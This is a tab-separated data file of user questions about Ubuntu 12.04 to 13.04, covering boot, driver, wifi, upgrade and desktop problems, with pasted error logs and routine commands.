285690	help lost ubuntu operating system and data	i need help in how to recover my ubuntu , i lost the entire operating system . i was using the windows booting system with wubi . my system is asking me to reinstall windows , i do not want to do this , i only want ubuntu on my system period . i need information on how i can do this . please help and i thank you in advance for your time and help in this matter .
285691	is it possible to clean the apt cache from the command line ?	i ask because ubuntu tweak 's janitor is frozen due to the sheer number of packages in the cache that accumulated during the upgrade from 12.10 to 13.04 .
285693	ubuntu 13.04 possible lightdm bug	i 've updated to ubuntu 13.04 but i 'm having some issues . first i 've updated it trough software updater , then this bug appeared so i did clean install , purging root and home partitions too . so the bug is this : http : //screencloud.net/v/gubp when i login , the background does n't refresh and stuck on login screen . anyway , unity is fully usable , except super button , alt button and context menu does not work on desktop , but in all applications + on desktop if mouse is hovering launcher or top panel . i 've tried to change the wallpaper using `` system settings '' , no success , even the little thick in bottom does not move . thanks in advance .
285696	ubuntu does n't boot after windows 7 installation ?	i installed ubuntu 12.10 64 bit on my hard drive , then decided to install windows 7 alongside on a 25 gb partition . i shrank my ubuntu install by about 25 gb with a gparted live usb . ubuntu booted correctly after the shrink . i shut down and installed windows 7 on the 25 gb partition . now windows 7 boots , and ubuntu does n't . did i overwrite my mbr ? if so , how do i fix it ?
285704	ca n't boot into ubuntu 13.04 64 bit	i just freshly installed ubuntu 13.04 64bit using a bootable usb . after installing i click restart and my laptop boots into windows 7 without asking me to select os . my boot menu is a traditional one does not have secure boot or uefi options .
285707	ubuntu 13.04 screen brightness only changes via hotkeys	this is a new problem i 'm facing in 13.04 , and is not related to what worked for 12.10 or earlier . in 12.10 , i had the acpi_backlight=vendor in my grub in order to make the brightness setting work . however , this does not work on 13.04 . i do n't even see a brightness bar . to change that , i tried acpi_osi= and the brightness bar appeared in the system settings . moving it does n't change the brightness , but using my hotkeys does . since ubuntu does n't remember the brightness settings between boots , i had a script that would adjust it during startup . now , even that does n't seem to work . only my hotkeys work at the moment . laptop information : model : acer aspire e1-571 processor : intel® core™ i3-3110m cpu @ 2.40ghz × 4 graphics : intel® ivybridge mobile os type : 64bits things i 've tried acpi_osi= using this makes my hotkeys work , but the brightness slider does n't work acpi_osi=linux acpi_osi= ' ! windows 2012' acpi_osi= ' ! windows 2012 ' acpi_backlight=vendor acpi_backlight=vendor
285714	can not connect to wifi with ubuntu 12.04	i have a dell latitude e6410 that i can not get to connect to a specific wpa-personal wireless network when ubuntu 12.04 is installed . what is strange , is that when i have 11.10 ( 32-bit ) installed on this laptop , i can connect to this network just fine , but when running 12.04 ( either 32-bit or 64-bit ) i can not . even to the point where upgrading from 11.10 to 12.04 from the web over this connection , after the upgrade completes , the wireless network is unavailable . i know the wireless adapter is working , because i can connect to a different wpa-personal network from 12.04 , but not this one . to recap : -networka and networkb are both wpa-personal wireless networks in my house , run from different radios and connecting to different networks . -with 11.10 installed on my laptop i can connect to both networka and networkb -with 12.04 installed on the same laptop ( via fresh install or upgrade from 11.10 ) i ca n't connect to networka , but i can connect to networkb . clearly i 'm missing something ...
285718	my lenses are missing	this is what my dash currently looks like . i have no clue why the other lenses are not being shown . $ sudo apt-get install unity-lens-friends unity-lens-files unity-lens-help unity-lens-movie unity-lens-radios reading package lists ... done building dependency tree reading state information ... done unity-lens-files is already the newest version . unity-lens-friends is already the newest version . unity-lens-help is already the newest version . unity-lens-radios is already the newest version . unity-lens-movie is already the newest version . 0 upgraded , 0 newly installed , 0 to remove . /usr/share/unity/lenses $ ls contacts files friends help movie radios shopping this disappearing act has happened after upgrading to 13.04 ( 64bit ) . all i did was remove eclipse installation and installed a standalone version of it . but i highly doubt
285722	wifi does not work on ubuntu 13.04	i have a dell latitude e5510 i dual boot with windows 7 and the wifi works good with windows 7 but when i load in on ubuntu it fails to make a connection i had to put a usb wifi adapter in to get wifi . i would really like to know how to fix this so i do n't have to use a usb wifi stick .
285723	tortoisehg does n't show up in 13.04	tortoisehg previously worked on 12.10 , but after today 's reinstall , it simply does n't show up , not even with the thg command .
285724	pyside application lost icons when upgraded to ubuntu 13.04	i 'm developing an application in python 3 using pyside . i upgraded my system form 12.10 to 13.04 today , and now i no longer have icons in my toolbar . the icons are loaded using qicon.fromtheme ( ) . does anybody know why it no longer works ? is there a way to fix this ?
285725	google chrome does not open	when i click on the google chrome icon from the launcher it does not open . i tried searching in the dash and clicking on its icon but it does not open at all . i tried the terminal as well , like this : $ google-chrome and this is the output : ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( google-chrome:19866 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed [ 19866:19866:0426/060718 : error : process_singleton_linux.cc ( 239 ) ] readlink ( /home/omar/.config/google-chrome/singletonlock ) failed : invalid argument [ 19866:19866:0426/060718 : error : process_singleton_linux.cc ( 239 ) ] readlink ( /home/omar/.config/google-chrome/singletonlock ) failed : invalid argument [ 19866:19866:0426/060718 : error : process_singleton_linux.cc ( 263 ) ] failed to create /home/omar/.config/google-chrome/singletonlock : file exists [ 19866:19866:0426/060718 : error : process_singleton_linux.cc ( 239 ) ] readlink ( /home/omar/.config/google-chrome/singletonlock ) failed : invalid argument [ 19866:19866:0426/060718 : error : chrome_browser_main.cc ( 1157 ) ] failed to create a processsingleton for your profile directory . this means that running multiple instances would start multiple browser processes rather than opening a new window in the existing process . aborting now to avoid profile corruption .
285726	new kernel does not work properly	i installed kernel version 3.8.8 from http : //kernel.ubuntu.com/~kernel-ppa/mainline/ . but after the installation when i booted using the new kernel nothing seemed to work . i have low resolution , network connections are not working . i cant think of a reason for the problem . the older kernel works fine ( 3.2.x ) . i have a hp g630 laptop . i installed , linux-headers-3.8.8-030808_3.8.8-030808.201304170248_all.deb linux-headers-3.8.8-030808-generic_3.8.8-030808.201304170248_amd64.deb linux-image-3.8.8-030808-generic_3.8.8-030808.201304170248_amd64.deb if someone knows the reason for this problem please help me to fix this
285727	no audio via hdmi on radeon hd 7570 ( ubuntu 13.04 , 12.10 , & 12.04 )	i am fairly new to ubuntu , i have only been using it for ~2.5 months . is there any way to fix the hdmi audio , besides the proprietary drivers ? if i need to report it as a bug where would be my best bet ? as stated in the title audio will not work via hdmi for the radeon hd 7570 . hdmi does not appear in sound settings and alsamixer does not properly recognize the card i have tried all of the suggestions i 've come across : editing /etc/default/grub with `` radeon.audio=1 '' ( then update grub ) updating alsa-mixer xorg-edgers ppa mainline kernels ( v3.9 ) etc ... i forgot the rest , it 's been a tough two months of trying to figure this out , sorry ... : ( running ubuntu 13.04 , video card : amd radeon hd 7570 , computer : dell xps 8500 hdmi also does not work on ubuntu 12.04 or 12.10 ( catalyst does have hdmi audio but looks terrible ) . amd catalyst ( fglrx ) driver does work for audio but the video is subpar at best , it 's hard to read any text because of the blockyness , and runs awkwardly slow for some more graphics intensive programs . the xorg servers are the exact opposite ( audio does n't work but video looks great , text is easy to read , and runs the more graphics intensive stuff better ) . it might be worth noting that lspci erroneously displays `` radeon hd 6000 series '' for `` audio '' but correctly identifies it as hd 7570 for video . also alsamixer is showing `` ati r6xx hdmi '' for card 1 i 've included the lspci , aplay -l , and the info alsamixer displays below . if there is anything else that would help , please let me know . i would appreciate any help i can get . lspci : 00:00.0 host bridge : intel corporation xeon e3-1200 v2/3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation h77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series/c210 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati turks pro [ radeon hd 7570 ] 01:00.1 audio device : advanced micro devices [ amd ] nee ati turks/whistler hdmi audio [ radeon hd 6000 series ] 02:00.0 network controller : atheros communications inc. ar9485 wireless network adapter ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 07 ) ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ aplay -l : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc887-vd digital [ alc887-vd digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ alsamixer ( for device 1 ) : card : hd-audio generic f1 : help chip : ati r6xx hdmi f2 : system information view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card item : s/pdif esc : exit
285730	how to change background color of the dots during boot	i am fine with ubuntu splash screen and i do n't want another theme , i just want to change the background color to black , the five white dots to black , and the five orange dots which overlap the original white dots to black . how can i do that ?
285732	why is the installation of ubuntu on hp pavilion zd8000 failing ?	i have a hp pavilion zd8000 machine 80g hdd , 1g ram , pentium 4 . i can get ubuntu to run on it in the `` try '' mode , but it will not install . before it gets to the screen where you choose to run alongside windows , i get a screen full of messages and it just stops . could the cd i created be corrupt or is there an incompatibility issue with the pc ?
285734	13.04 installer crashes	the installer crashes after codec selection step . if wifi is enabled then is crashes after the wifi selection step . clicking next in the above steps show a dialog box with no readable text , only some question marks . any ideas ? fyi : i have 3 hard drives in my system .
285736	ubuntu installation and updates	this is my firs os change . can i install ubuntu on a completely formatted hard drive ? and do i need to install additional drivers from microsoft or is every thing i need is on the ubuntu dvd i have just downloaded ? also like microsoft , does ubuntu have automatic updates ?
285738	upgrading from 12.10 to 13.04	ca n't upgrade using terminal its showing no latest version is there , and update manager also not showing anything regarding the 13.04 , even though i had changed the manager settings .
285740	ati proprietary drivers	i 've been holding back all xserver-xorg* updates in order to keep from breaking the ati drivers but apparently i 'm not holding back enough because my recent update broke them . i 'm using catalyst 13.4 on amd64 . in order to keep from breaking video with the ati drivers , what packages should i be holding back ? also , i 've seen various methods of installing these drivers ( i.e . from the amd website , from a ppa ) . is there a preferred method ? thanks in advance for any help .
285741	how to connect to wpa2 enterprise mschapv2 ?	my college internet used to work in 12.04 , but now 13.04 refuses to connect to `` wpa2 enterprise '' .
285743	ubuntu 13.04 will not boot from live cd	when i try to boot up ubuntu 13.04 from a live cd be i send to the normal boot ( windows 8 ) this is what i got after i run the repair-boot dvd : http : //paste2.org/cj0k8pbf i have a hp pavilion dv6-2153eo pc thanks for answer
285745	ubuntu-gnome on mac	i would like to install ubuntu-gnome 13.04 which was released today on my macbook pro . however , unfortunately this version of ubuntu does not have and amd64+mac image . should i just install the regular amd64 release ? or is there no way to use ubuntu-gnome on mac ? edit : just installed the amd64.iso image of ubuntu-gnome 13.04 raring . works like a charm , it was easy to boot from a usb using refit . not only that , but all the hardware on my 2013 macbook pro was automatically detected , so i actually had internet during installation . so it turns out the +mac series are really only needed if you run an older mac that wo n't be able to boot from the cd/usb install disk otherwise . however , it seems that this is not really needed for most newer macs , especially if you installed refit . you can boot straight into grub-efi even with the regular amd64 iso . great release !
285753	cairo-dock theme does n't apply properly	i just upgraded from 12.10 to 13.04 and i 'm having trouble getting the cairo-dock theme on my system working . i upgraded on the cairo-dock theme ( if that makes a difference ) and it was just the cairo-dock , with no ubuntu side and top bar . now , as you can see in my screenshot : both ubuntu and cairo docks are showing . and before you ask , no i 'm not using the default ubuntu theme . thanks in advance for the help !
285755	on boot , ubuntu 13.04 reaches 89ยบ c and shutdown	after install ubuntu 13.04 my notebook , an inspiron 15r n5010 , reaches 89ยบc and shutdown . i tried to boot on recovery mode and before shutdown seems to say that `` acpi '' gave the order . somebody knows how to fix it ? or at least remember how to turn off the acpi mode . i did it once because of problems on the os but i cant remember how .
285761	installation of capybara-webkit ruby gem	i have following errors when i try to install capybara-webkit ruby gem gem : :installer : :extensionbuilderror : error : failed to build gem native extension . /home/s/.rvm/rubies/ruby-1.8.7-p371/bin/ruby extconf.rb cd src/ & & /usr/lib/x86_64-linux-gnu/qt4/bin/qmake /home/s/.rvm/gems/ruby-1.8.7- p371 @ /gems/capybara-webkit-0.14.1/src/webkit_server.pro -spec /usr/share/qt4/mkspecs/linux-g++ -o makefile.webkit_server cd src/ & & make -f makefile.webkit_server make [ 1 ] : entering directory `/home/s/.rvm/gems/ruby-1.8.7-p371 @ /gems/capybara- webkit-0.14.1/src' g++ -c -pipe -o2 -wall -w -d_reentrant -dqt_no_debug -dqt_webkit_lib -dqt_gui_lib - dqt_network_lib -dqt_core_lib -dqt_shared -i/usr/share/qt4/mkspecs/linux-g++ -i . - i/usr/include/qt4/qtcore -i/usr/include/qt4/qtnetwork -i/usr/include/qt4/qtgui - i/usr/include/qt4/qtwebkit -i/usr/include/qt4 -i . -o enablelogging.o enablelogging.cpp g++ -c -pipe -o2 -wall -w -d_reentrant -dqt_no_debug -dqt_webkit_lib -dqt_gui_lib - dqt_network_lib -dqt_core_lib -dqt_shared -i/usr/share/qt4/mkspecs/linux-g++ -i . - i/usr/include/qt4/qtcore -i/usr/include/qt4/qtnetwork -i/usr/include/qt4/qtgui - i/usr/include/qt4/qtwebkit -i/usr/include/qt4 -i . -o authenticate.o authenticate.cpp in file included from authenticate.cpp:2:0 : webpage.h:46:17 : error : incomplete type ‘qnetworkreply’ used in nested name specifier webpage.h:46:17 : error : incomplete type ‘qnetworkreply’ used in nested name specifier webpage.h:46:45 : error : template argument 1 is invalid make [ 1 ] : *** [ authenticate.o ] error 1 make [ 1 ] : leaving directory `/home/s/.rvm/gems/ruby-1.8.7-p371/gems/capybara- webkit-0.14.1/src' make : *** [ sub-src-webkit_server-pro-make_default-ordered ] error 2 command 'make ' failed i use ubuntu 13.04 and i have installed libqt4-dev and g++ . does anyone know how to fix it ? i installed it correctly on ubuntu 12.10 .
285762	out of the box ubuntu 13.04 with chromium does not automatically use web apps	i really like the web apps feature in ubuntu , but when i installed ubuntu 13.04 and cchromium the automatic integration did n't work . i have no idea how to kick-start the integration . anyone an idea ?
285764	ubuntu 12.10 upgrade to 13.04 hang	i am on my macbook , i am upgrading from ubuntu 12.10 to 13.04 . the upgrade went fine , up until about half way , where it just stopped . no error message , and it is no frozen . nothing is happening , it just says installed cabextract .
285769	black screen with clayton @ clayton-desktop : ~ $ in the top left corner . i have no idea what to do	i am a long term but ict challenged ubuntu user . my stable desktop crashed a few weeks ago while i was on the interweb and ever since boots to black screen with clayton @ clayton-desktop : ~ $ and a non-blinking cursor in the top left corner . how do i get ubuntu and my files back ? currently running 12.04 ( from memory , or maybe 12.10 ) . any help would be appreciated p.s . i have looked through many of the faq 's without any joy including the ones suggested here which seem to be off topic as they relate to installs not functioning systems .
285770	unity-bar fails to show randomly when using mouse ?	description of my problem : i have set unity bar in 13.04 to auto-hide when not used under apperance settings . sometimes , for example when using other programs ( no matter what program ) - it fails to show again , when i am moving my mouse into the top left corner . this is working sometimes , and sometimes it just does n't work , and i have to click the dash-button in order to make it appear again . well , and i have tried to set the sensitivity to other values , with no luck , and i have tried configuring ccsm to make it act normally - no luck . question : can this issue be fixed , so the mouse reveal will work normally ? its even failing on the desktop sometimes . same issues was found in earlier version , 12.10 , but i chose not to bother about it . there was no duplicates found of this described problem .
285772	how do i install libreoffice 4.0.2 ?	after i upgraded to 13.04 i noticed that libreoffice 4.0.2 was n't working , at all . when i click its launcher i get the this start up box : which amounts to no program being opened . i have downloaded the tarball from this webpage and extracted it and ran sudo apt-get purge libreoffice4.0 to clear all prior installations and then i cd to the directory of the extracted tarball , then i ran sudo dpkg -i *.deb and then went cd to the desktop-integration subdirectory and then ran sudo dpkg -i *.deb and received the output : dpkg : regarding libreoffice4.0-debian-menus_4.0.2-2_all.deb containing libreoffice- debian-menus : libreoffice-core conflicts with libreoffice-unbundled libreoffice-debian-menus provides libreoffice-unbundled and is to be installed . dpkg : error processing libreoffice4.0-debian-menus_4.0.2-2_all.deb ( -- install ) : conflicting packages - not installing libreoffice-debian-menus errors were encountered while processing : libreoffice4.0-debian-menus_4.0.2-2_all.deb
285776	how do i open dolphin in a certain folder from the terminal ?	i would like to add a starter icon to my task bar that runs dolphin but initially starts in a folder i would like to specify the dolphin handbook does n't explain this .
285779	after upgrading to 13.04 unity interface is not showing	i 've upgraded to raring last night . the upgrade itself went okay , no errors . but when i rebooted the computer afterwards and logged in to my unity session , all i could see was the desktop background ( together with desktop icons ) , and no unity interface . the super button shortcut was n't showing the dash , there was no top panel etc . please see the screenshot . as a hint , i 'm suspecting it 's got something to do with my switchable graphics . i 'm running ubuntu on acer aspire as5830tg with nvidia gt540m and an intel integrated card . in 12.10 i was using bumblebee to manage the graphic card switching . during the upgrade i saw something related to nvidia had to be uninstalled , but did n't pay much attention to it . i ca n't be sure if it has anything to do with my problem though . what could possibly go wrong ?
285781	ubuntu 12.04 not booting	i have installed ubuntu on 2 brand new 1tb hd 's ( raid1 config ) using a boot cd . the install seems to have completed correctly but it wont boot . using the boot cd and `` try ubuntu '' i can see all the files are there on the hard drive . i have tried the commands shown on this page ( https : //help.ubuntu.com/community/boot-repair ) to no avail . when i look at the bios it is showing only `` intel server '' under hard drives in boot options . when it goes through the boot process , after the bios screen it just comes up with an error about not detecting bootable drives . these hard drives were meant to replace an existing setup with 2 320gb drives in raid1 . when i switch back to them , it loads without any problems . we run windows on every other computer on the network , this one is just used as a file server . any ideas on what has gone wrong ?
285783	upgrading to 12.04 to 13.04	i tried to upgrade from 12.04 to 13.04 but it 's not working . looks like it see 12.10 as the next version . i can play around with some hacks but what 's the officially supported way of upgrading from 12.04 to 13.04 ?
285787	does the change to mir affect other ubuntu derivates like xubuntu or kubuntu ?	does the change to mir affect other ubuntu derivatives like xubuntu or kubuntu ? for example : will gnome 3 , xfce or kde be ported to mir ?
285788	mac address changing in ubuntu 12.04	i am trying to change the mac address of my device . i tried the ifconfig way as well as the macchanger tool way . however although the mac address changes on interface eth0 . i do not get a dhcp based ip address . when i tried a nework-manager restart , then the old eth0 mac is assigned and i get an ip . is there a way to get an ip based on my new random mac ? please help .
285791	shutdown/dash has weird artifact - 13.04	see the bottom left of the dash example . the shutdown has a similar problem , but i was unable to take a print screen . any ideas why or how to fix ? the upgrade to 13.04 went fine other than this .
285792	ubuntu 13.04 social lens not working ?	i 'm not getting any results in the social lens . i have a couple of twitter accounts set up in online accounts and they seem to work ok in the friends-app but still nothing appears in the social lens . any help with finding the cause would be good .
285793	how do i disable recursive search in nautilus 3.6	recursive search in nautilus 3.6 completely breaks my keyboard navigation . i often navigate network volumes , and typing to get directly to a folder and clicking enter was very quick . now typing removes everything in the view and imposes a 30 second delay which is completely useless . if it showed whats in the current directory immediately , and then searched it would be fine , but as it is now i just want to turn it off . i could n't find anything in dconf-settings . anyone know how to disable it ?
285794	3d graphics acceleration	grphics acceleration is disabled in ubuntu . i went to software & updates and opened the additional drivers tab and was presented with a list of drivers , which one am i supposed to install ? why is the correct driver not automatically selected and enabled during installation ? this is really not user friendly , i ca n't even play a simple webgl game ( such as apathy.plankhead.com ) because it needs 3d acceleration . update : i installed the `` tested '' nvidia drivers as per lupp0l0 's recommendation and restarted my computer . startup failed with a screen that said `` nvidia : module license 'nvidia ' taints kernel. '' . after rebooting a few times , ubuntu finally started . i 'm worried that next time i restart ubuntu will fail to load again .
285797	where is source code of program dots ( braille-program for blind people ) ?	where can i find the source code of dots ? it is given as program for blind people in ubuntu .
285799	empathy online contacts do not show up	the problem after upgrading from 12.10. to 13.04. empathy does n't show online contacts anymore . all accounts seem to be affected by this ( facebook , icq ) . sporadically a contact is listed as online for a few moments but then disappears again ( i guess these are contacts that just went online ) . there is at max one contact listed as online at any time . what i tried i tried removing and adding the accounts but had no luck . i also tried removing cache and config files of empathy and telepathy . again no luck . running empathy debugger did not reveal any problems . update 1 when removing and readding my facebook account i now get a crash in telepathy-gabble : telepathy-gabble crashed with sigsegv in dbus_message_get_reply_serial ( ) upon continuing after the crash , the problem remains ( no contacts shown as online ) . update 2 there is at max one contact listed as online at any time . sometimes more than one contact is listed as online . but only ever for a short period of time . update 3 when starting empathy with facebook account configured : empathy-auth-client crashed with sigsegv in ag_auth_data_get_parameters ( )
285803	i regret choosing to hide a particular error , how can i show it again ?	when an application error occurs , ubuntu prompts asking if you want to submit it and/or hide future errors of this type ( e.g . a particular error from a particular application ) . i have opted to hide certain errors ( but not others ) , but now i 've changed my mind . where can i find a list of the individual errors i 've hidden , and opt to show some of them ? as a second-place alternative , can i choose to just show all errors again ?
285808	wireless disconnected after upgrade ubuntu 13.04 at approximately 5 - 10 meters	since i used ubuntu version 12.10 , i connect wi-fi & internet running normally at a distance of approximately 5-10 meters of range of the router or parallel to the floor of the room . after i upgraded to 13.04 and i connect to wi-fi in same distance , my laptop can not connect to wi-fi , except when my laptop with a distance of 1 meter , it can connect . i 've followed the stages from ubuntu documentation/instructions in wireless troubleshooter section page and have done all sorts of ways to solve the problem , but the problem still relapse . i think this is bug . how to solve the problem ? anyone idea to solve it ?
285809	ubuntu 13.04 - dual boot problem - unable to mount windows 8 partition	i installed ubuntu 13.04 alongside windows 8 and almost everything works fine ( dual boot for both windows 8 & ubuntu 13.04 is working great ) . but when i try to access my windows 8 partition via ubuntu i get the following error : unable to access â371 gb volumeâ error mounting /dev/sda2 at /media/dan/544a4c7e4a4c5f3c : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/dan/544a4c7e4a4c5f3c '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . ideas anyone ? please note that i 'm a linux newbie and ubuntu is the first non windows os i 've ever tried . thank you
285812	dell inspiron 7720 - upgrade from 12.10 to 13.04 broke touchpad driver	today the updated informed me that there are udpates and a new version of kubuntu . after installing the updates and pressing `` quit '' the updater began upgrading to 13.04 ( ? ! ? ! ? ! ) . anyway , after the upgrade the touchpad is not working any more . i tried to install driver for touchpad using suggestions from this forum and ended up with this error during dkms install : dkms make.log for psmouse-alps-dst-0.4 for kernel 3.8.0-19-generic ( x86_64 ) пт апр 26 11:10:50 eest 2013 make : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /var/lib/dkms/psmouse/alps-dst-0.4/build/src/psmouse-base.o /var/lib/dkms/psmouse/alps-dst-0.4/build/src/psmouse-base.c : in function ‘__check_smartscroll’ : /var/lib/dkms/psmouse/alps-dst-0.4/build/src/psmouse-base.c:64:1 : warning : return from incompatible pointer type [ enabled by default ] cc [ m ] /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.o /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.c : in function ‘set_input_params’ : /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.c:1153:3 : error : too few arguments to function ‘input_mt_init_slots’ in file included from /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.c:29:0 : include/linux/input/mt.h:78:5 : note : declared here /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.c:1165:3 : error : too few arguments to function ‘input_mt_init_slots’ in file included from /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.c:29:0 : include/linux/input/mt.h:78:5 : note : declared here make [ 1 ] : *** [ /var/lib/dkms/psmouse/alps-dst-0.4/build/src/synaptics.o ] error 1 make : *** [ psmouse.ko ] error 2 make : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' i also came upon this topic and found it was closed ( so not very useful ) ... any help will be appreciated . thanks in advance
285824	`` sorry , ubuntu 12.10 has experienced an internal error '' . how to overcome the error ?	i am experiencing a error on ubuntu 12.10 . i have installed ubuntu 12.10 on my laptop . on every re-start i see a popup describing the error . below is the snapshot of the pop window . i do not know how to solve and overcome the error . the error title : modem-manager crashed with sigsegc in mm_plugin_base_supports_task_complete ( ) executable path /user/sbin/modem-manager package modemmanager 0.6.00.really-0ubuntu1 problem type crash
285829	installer : erase and reinstall on existing ubuntu partition erases all partitions including windows partitions	when trying to install 13.04 in an existing ubuntu partition . the installer gives an option `` erase and reinstall on existing ubuntu partition '' . doing that also erase all the other partions on that hardrive in including ntfs/fat ones and makes one big partition . is that a nasty bug or a feature ? this might be reproducible easily in vm .
285832	can i disable `` online accounts '' and still use empathy ?	i want to have control over what happens with my online presence so i absolutely do not want any software to be able to log in to any of my online accounts and post/change/delete things . ever . nor do i know where the login credentials that ubuntu online accounts uses is stored , i.e . who has access to that information ? allowing software to access my accounts automatically is bad , but potentially giving other people access to my accounts is even worse . however , i do like to chat and was happy with empathy storing passwords locally since it would only allow me to chat but did n't do anything else . i want to fully disable ubuntu online accounts on my machine while still using chat software . how can i do this ?
285836	letter-spacing in gnome-terminal	after update to 13.04 have broken fonts in gnome terminal : it is `` ubuntu mono 13 '' font , but same spacing problems occurs with any monospace font . what can i do ?
285839	configure wacom expresskeys to click	i 've just bought an intuos5 tablet and going to use it for some map digitizing under ubuntu linux 12.04 and 13.04 . map digitizing is quite different than sketching - i need to position the cursor exactly then to click , preferably with the other hand , avoiding accidental moving during the `` click '' . that is why i would like to disable the left mouse click when the pen touches the tablet and use some `` expresskeys '' on the left instead . under windows i can configure everything as i like - s. the screenshots : , under ubuntu linux there are much less options in the gui configuration applet - it is not possible to map a pad button to a mouse button - only to a keystroke . next option i 've tried is xsetwacom . disabling a click was easy - just setting the threshold for the pen to the highest 2048 value . continuing with the button mapping ... xsetwacom is thoroughly documented and seems to offer my desired function . wiki http : //sourceforge.net/apps/mediawiki/linuxwacom/index.php ? title=tablet_configuration # pad contains a suitable example xsetwacom set `` wacom bamboofun 2fg 4x5 finger pad '' button 1 1 xsetwacom set `` wacom bamboofun 2fg 4x5 finger pad '' button 2 2 xsetwacom set `` wacom bamboofun 2fg 4x5 finger pad '' button 3 3 xsetwacom set `` wacom bamboofun 2fg 4x5 finger pad '' button 4 4 tried to adapt it for my intuos - did not work : xsetwacom set 'wacom intuos5 touch l pen pad ' button 2 2 xsetwacom set 'wacom intuos5 touch l pen pad ' button 3 3 so my questions : does mapping expresskeys to `` mouse '' buttons work for anybody under linux ? with intuos5 ? with other intuos models ? with a newer bamboo ? could somebody just try the above xsetwacom commands on his tablet and tell if he can now click with expresskeys ?
285841	disabled secure boot and enabled uefi for dual-boot on acer ?	i have an acer aspire m laptop , which comes preinstalled with windows 8 , so it has this new uefi stuff . to get the ubuntu livedvd running , i had to disable the uefi completely and switch to legacy bios mode . but after that i could n't boot win8 anymore . in many questions here i read that ubuntu 12.04.2 works with efi but not with secure boot . but since i ca n't disable just one , i 'm pretty much in a dead end . also it seems that uefi boots faster than legacy bios , so it would be nice if i could keep all this for both windows and ubuntu : \
285842	shortcut does n't work	i 've just installed dropbox . when i execute binary , it starts . but when i 'm creating a shortcut to this binary and running it nothing happens . when i open shortcut in gedit , gedit closes .
285845	is there unity3d webplayer for ubuntu ?	there are many games built on unity3d , but i ca n't find unity webplayer for linux . unity for windows
